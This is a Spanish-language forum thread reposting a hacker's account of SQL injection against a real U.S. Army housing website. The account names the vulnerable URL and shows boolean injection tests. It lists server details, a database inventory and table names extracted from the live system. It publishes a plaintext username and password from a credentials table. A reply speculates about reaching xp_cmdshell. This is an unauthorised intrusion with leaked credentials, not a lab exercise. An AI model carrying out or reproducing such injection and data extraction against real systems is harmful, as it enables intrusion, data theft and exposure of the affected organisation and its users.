/\ (_) |
/ \ _ __ _ __ ___ _ _ _ __ ___ _| |
/ /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
/ ____ \| | | | | | | | |_| |_| | | | | | | |
/_/ \_\_| |_| |_| |_|\__, (_)_| |_| |_|_|_|
__/ |
|___/
The
United States Army is the branch of the
United States Military responsible for
land-based military operations. It is the largest and oldest established branch of the
U.S. military and is one of seven uniformed services. The modern Army has its roots in the
Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the
Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil (http://onestop.army.mil/)
This website is
vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:
and 1=1– (True)
(http://i49.tinypic.com/vdzrsx.jpg) (http://i49.tinypic.com/vdzrsx.jpg)
and 1=2– (False)
(http://i47.tinypic.com/xm4mk0.jpg) (http://i47.tinypic.com/xm4mk0.jpg)
Ok, in this picture we can see all main informations about webserver.
(http://i46.tinypic.com/105ds02.jpg) (http://i46.tinypic.com/105ds02.jpg)
Main information:
Citar[b]#Version[/b]: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
[b]#User[/b]: Dynatouch
[b]#Database[/b]: AHOS
[b]#Host Name[/b]: AHSGSVDAHQIT130
All databases:
Citar[0] AHOS
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES
We can access information_schema, so let's see the tables from principal database "
AHOS"
(http://i49.tinypic.com/1440il4.jpg) (http://i49.tinypic.com/1440il4.jpg)
Citar[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items
Now, here are some interesting tables, like
mgr_login_passwords.
(http://i45.tinypic.com/23pvk6.jpg) (http://i45.tinypic.com/23pvk6.jpg)
Here i found
user :
password columns, with :
Citar#Username: Dynatouch
#Password: AHOS
wtf! (http://tinkode.baywords.com/wp-includes/images/smilies/icon_neutral.gif)
That it's all! Bye, TinKode...
dejo el enlace: http://tinkode.baywords.com/index.php/2010/01/army-mil-full-disclosure/
Las contraseñas en texto plano! ;-)
Hay que mirar además los otros temas que tienen en ese blog, no solo la US Army ha quedado mal parada, hay temas para Kaspersky, Yahoo, ESET Nod, Apple, Nasa :o
Saludos
jojo cierto se ve muy interesante la pagina ;-); y por lo que se ve en la web vulnerable usan sql server 2000, asi que considerando que son vulnerables a injecciones tal vez el xp_cmdshell este activado xD
Una pregunta, viendeo ese paper, si yo porbase una injecion usando ese ejemplo en la pagina, podria tener represalias legales?
Saludos
casi siempre las webs con mas reputación son las mas vulnerables a pesar que son los que mas gastan dinero. Talves en ves de gastar tanto dinero en crear la web deberían destinar una cantidad en auditar el sistema en busca de falencias.
Cita de: WHK en 14 Enero 2010, 21:01 PM
casi siempre las webs con mas reputación son las mas vulnerables a pesar que son los que mas gastan dinero. Talves en ves de gastar tanto dinero en crear la web deberían destinar una cantidad en auditar el sistema en busca de falencias.
Wow no tenia ni idea, es cierto que a veces gastan mas en que quede bonita y tal...
Será cuestion de investigarlo...
Saludos
cuanto mas grande sea una web, mas posibilidad hay de que tenga bugs
Cita de: HuSSe19 en 12 Marzo 2010, 08:01 AM
cuanto mas grande sea una web, mas posibilidad hay de que tenga bugs
Exacto estoy contigo... es decir cuanto más código más probabilidad de error ;D